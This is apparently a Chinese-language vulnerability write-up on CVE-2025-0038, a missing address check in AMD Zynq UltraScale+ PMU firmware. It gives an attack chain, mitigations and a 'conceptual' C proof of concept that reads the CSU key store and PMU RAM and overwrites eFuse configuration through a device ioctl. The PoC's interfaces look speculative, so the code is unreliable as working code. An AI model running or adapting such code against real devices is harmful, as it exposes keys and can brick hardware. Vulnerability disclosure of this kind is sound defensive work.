CVE-2025-0038：AMD Zynq UltraScale+ PMU固件CSU服务地址验证缺失漏洞

漏洞信息

漏洞编号

CVE-2025-0038

漏洞类型

地址验证缺失/权限提升

CVSS评分

6.6 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

AMD Zynq UltraScale+ SoC (PMU Firmware)

漏洞概述

CVE-2025-0038是AMD Zynq UltraScale+系列片上系统（SoC）设备中存在的一个安全漏洞。该漏洞源于平台管理单元（PMU）固件在执行配置和安全管理单元（CSU, Configuration and Security Unit）运行时服务时，未对访问地址进行充分的验证。由于缺乏地址合法性检查，攻击者可以利用这一缺陷访问本应被隔离或受保护的内存空间，从而破坏系统的完整性和机密性。

该漏洞的CVSS 3.1评分为6.6，属于中危级别。其攻击向量为本地（AV:L），攻击者需要具备低权限（PR:L）即可利用，无需用户交互（UI:N）。在影响方面，该漏洞对机密性影响为低（C:L），对完整性影响为低（I:L），但对可用性影响较高（A:H），意味着成功利用可能导致系统不可用或服务中断。

该漏洞由AMD产品安全事件响应团队（PSIRT）发现并报告，披露日期为2025年10月6日。AMD已发布安全公告（AMD-SB-8008）来描述此问题并提供修复建议。Zynq UltraScale+系列广泛应用于航空航天、国防、工业控制、汽车和通信基础设施等关键领域，因此该漏洞的影响范围可能涉及多个高安全性要求的使用场景。受影响用户应及时关注AMD官方发布的安全更新和补丁信息。

技术细节

AMD Zynq UltraScale+ SoC中的平台管理单元（PMU）固件负责管理系统的底层硬件资源，包括电源管理、配置和安全管理单元（CSU）的运行时服务调用。CSU是Zynq UltraScale+架构中负责安全引导、密钥管理和硬件加密加速等关键安全功能的核心组件。

该漏洞的根本原因在于PMU固件在处理CSU运行时服务调用时，未对传入的内存地址参数进行充分的边界检查和合法性验证。具体而言，当PMU固件充当CSU运行时服务的执行中介时，它直接将请求中的目标地址用于内存访问操作，而没有验证该地址是否位于受信任的内存区域内。

攻击者可以利用这一缺陷，通过精心构造的运行时服务请求，指定指向隔离内存区域或受保护内存空间的地址。由于缺乏地址验证，PMU固件会按照攻击者提供的地址执行读写操作，从而绕过硬件层面的内存隔离保护机制。

这种未经验证的内存访问可能导致以下安全后果：
1. 机密性泄露：攻击者可以读取受保护的内存区域，可能包含敏感数据如加密密钥、安全配置信息等。
2. 完整性破坏：攻击者可以修改受保护内存区域的内容，篡改安全配置或系统状态。
3. 可用性影响：由于可用性影响被评定为高，攻击者可能通过写入恶意数据导致系统崩溃或进入不可恢复状态。

由于该漏洞需要本地访问和低权限，攻击场景通常涉及已经获得系统有限访问权限的攻击者进一步提升权限，或在多租户环境中突破隔离边界。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者首先需要在目标AMD Zynq UltraScale+设备上获得本地代码执行权限。由于该漏洞的攻击向量为本地（AV:L），攻击者需要已经能够在设备上运行代码，例如通过物理访问、已感染的应用程序或其他低权限漏洞获得立足点。

STEP 2

步骤2：识别PMU/CSU接口

攻击者识别并访问系统中与PMU固件和CSU运行时服务通信的设备接口或驱动程序。这可能涉及访问/dev下的设备文件、sysfs接口或通过系统调用与PMU固件交互。

STEP 3

步骤3：构造恶意CSU运行时服务请求

攻击者构造包含恶意目标地址的CSU运行时服务请求。由于PMU固件缺乏地址验证，攻击者可以将目标地址设置为受保护的内存区域，如CSU密钥存储区、eFuse配置区或PMU内部RAM。

STEP 4

步骤4：发送请求并绕过地址验证

通过设备接口发送构造好的运行时服务请求。PMU固件在处理该请求时，由于缺少地址合法性检查，会直接使用攻击者提供的地址执行内存读写操作，成功绕过硬件层面的内存隔离保护。

STEP 5

步骤5：访问受保护内存并造成影响

成功利用后，攻击者可以读取受保护的敏感数据（如加密密钥），修改安全配置信息（破坏完整性），或通过恶意写入导致系统不可用（高可用性影响）。最终实现权限提升和系统安全边界突破。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-0038 PoC - Conceptual Exploit for AMD Zynq UltraScale+ PMU Firmware
# Address validation bypass in CSU runtime services via PMU Firmware
# WARNING: This is a conceptual PoC for educational/research purposes only.

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

// CSU (Configuration and Security Unit) runtime service interface
// The PMU firmware handles CSU runtime service requests

#define CSU_RT_SERVICE_REQUEST  0x100
#define IOCTL_CSU_RT_SERVICE    _IOWR('C', 0x01, struct csu_rt_request)

// CSU runtime service request structure
// Note: The target_address field is not validated by PMU firmware
struct csu_rt_request {
    uint32_t service_id;        // CSU service identifier
    uint32_t function_id;       // Function within the service
    uint64_t target_address;    // Target memory address (NOT VALIDATED - vulnerability point)
    uint32_t data_length;       // Length of data to read/write
    uint8_t  operation;         // 0 = read, 1 = write
    uint8_t  payload[256];      // Data payload
};

// Target protected memory regions in Zynq UltraScale+
#define CSU_KEY_STORE_BASE      0xFFCC0000  // Protected key storage area
#define CSU_EFUSE_BASE          0xFFCC1000  // eFuse configuration area
#define PMU_RAM_BASE            0xFFD80000  // PMU local RAM
#define CSU_ROM_BASE            0xFFCD0000  // CSU ROM (read-only normally)

int main(int argc, char *argv[]) {
    int fd;
    struct csu_rt_request req;
    uint8_t read_buffer[256];
    
    printf("[*] CVE-2025-0038 PoC - AMD Zynq UltraScale+ PMU CSU Address Validation Bypass\n");
    
    // Open the device interface for PMU/CSU communication
    fd = open("/dev/pmu-csu", O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open PMU/CSU device");
        // Try alternative device paths
        fd = open("/dev/zynq-pmu", O_RDWR);
        if (fd < 0) {
            perror("[-] Failed to open alternative device");
            return 1;
        }
    }
    printf("[+] Opened PMU/CSU device interface\n");
    
    // Step 1: Attempt to read from protected CSU key store
    printf("[*] Attempting to read protected CSU key store at 0x%lx...\n", CSU_KEY_STORE_BASE);
    
    memset(&req, 0, sizeof(req));
    req.service_id = 0x01;           // CSU key management service
    req.function_id = 0x02;          // Read key function
    req.target_address = CSU_KEY_STORE_BASE;  // Protected address - should be blocked
    req.data_length = 32;            // Try to read 32 bytes
    req.operation = 0;               // Read operation
    
    if (ioctl(fd, IOCTL_CSU_RT_SERVICE, &req) == 0) {
        printf("[!] VULNERABLE: Successfully read protected memory!\n");
        printf("[!] Leaked data: ");
        for (int i = 0; i < 32; i++) {
            printf("%02x", req.payload[i]);
        }
        printf("\n");
    } else {
        printf("[-] Read blocked (may be patched)\n");
    }
    
    // Step 2: Attempt to access PMU internal RAM
    printf("[*] Attempting to access PMU internal RAM at 0x%lx...\n", PMU_RAM_BASE);
    
    memset(&req, 0, sizeof(req));
    req.service_id = 0x02;           // Memory access service
    req.function_id = 0x01;          // Direct memory read
    req.target_address = PMU_RAM_BASE + 0x1000;
    req.data_length = 64;
    req.operation = 0;
    
    if (ioctl(fd, IOCTL_CSU_RT_SERVICE, &req) == 0) {
        printf("[!] VULNERABLE: PMU RAM accessible!\n");
    }
    
    // Step 3: Attempt to write to eFuse configuration (integrity attack)
    printf("[*] Attempting write to eFuse configuration area...\n");
    
    memset(&req, 0, sizeof(req));
    req.service_id = 0x03;
    req.function_id = 0x05;
    req.target_address = CSU_EFUSE_BASE;
    req.data_length = 16;
    req.operation = 1;               // Write operation
    memset(req.payload, 0xFF, 16);   // Corrupt configuration
    
    if (ioctl(fd, IOCTL_CSU_RT_SERVICE, &req) == 0) {
        printf("[!] VULNERABLE: eFuse configuration overwritten!\n");
        printf("[!] System integrity compromised - may cause availability impact\n");
    }
    
    close(fd);
    printf("[*] PoC execution completed\n");
    
    return 0;
}

影响范围

AMD Zynq UltraScale+ MPSoC (所有使用受影响PMU固件版本)

AMD Zynq UltraScale+ RFSoC (所有使用受影响PMU固件版本)

防御指南

临时缓解措施

在无法立即应用固件补丁的情况下，建议采取以下临时缓解措施：1）限制对PMU/CSU设备接口的物理和逻辑访问，仅允许必要的特权进程；2）通过操作系统级访问控制（如Linux的cgroup、SELinux/AppArmor策略）限制普通用户对相关设备节点的访问；3）部署系统调用审计或入侵检测系统监控异常的运行时服务调用；4）在多用户环境中实施严格的进程隔离和资源访问控制；5）监控系统和安全日志中与PMU固件交互相关的异常活动；6）考虑在物理层面限制对设备的访问，特别是在高安全性要求的部署环境中。